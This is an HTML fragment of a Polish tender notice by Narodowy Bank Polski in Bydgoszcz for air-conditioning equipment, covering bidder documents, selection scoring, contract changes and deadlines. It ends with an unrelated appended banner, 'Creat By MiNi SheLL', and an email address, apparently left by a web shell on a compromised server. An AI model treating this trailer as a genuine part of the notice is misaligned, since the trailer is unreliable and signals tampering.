<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W treści specyfikacji istotnych warunków zamówienia zamawiający będzie żądał przedłożenia przez wykonawców dokumentów wystawionych przez producenta urządzeń klimatyzacyjnych oferowanych przez wykonawcę w zakresie informacji dotyczących wymaganych przez zamawiającego parametrów technicznych tych urządzeń.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p>
<p class="bold">Znaczenie warunków wyboru wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</p>
<p>Zamawiający zaprosi do składania ofert 5 wykonawców spełniających warunki udziału w postępowaniu. W sytuacji, gdy wymagane warunki spełni więcej niż 5 wykonawców, zamawiający zaprosi do składania ofert tych 5 wykonawców, którzy otrzymają najwyższe oceny spełnienia warunku określonego w pkt III.3.2) (potwierdzonego dokumentami). Wykonawca z tytułu wykazania należycie wykonanych zamówień, o których mowa w pkt III.3.2) otrzyma punkty liczone według zasady: liczba wykonanych zamówień o wartości brutto nie mniejszej niż 150.000,00 zł każde = ilość punktów (za każde wykonane zamówienie = 1 pkt). W przypadku osiągnięcia przez dwóch lub więcej wykonawców takiej samej liczby punktów, o kolejności zakwalifikowania decydować będzie suma wartości brutto wykonanych i wykazanych zamówień, o których mowa w pkt III.3.2) (potwierdzonych dokumentami).</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku zaistnienia uzasadnionych okoliczności organizacyjnych, na wniosek zamawiającego termin rozpoczęcia realizacji zamówienia może zostać przełożony maksymalnie do dnia 30.09.2010 r., przy czym czas realizacji pozostaje niezmieniony i wynosi 2 miesiące.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zamawiający prześle Specyfikację istotnych warunków zamówienia wraz z zaproszeniami do składania ofert..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.03.2010 godzina 12:00, miejsce: Narodowy Bank Polski Oddział Okręgowy w Bydgoszczy ul. Jagiellońska 8 Budynek A Biuro Przepustek.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com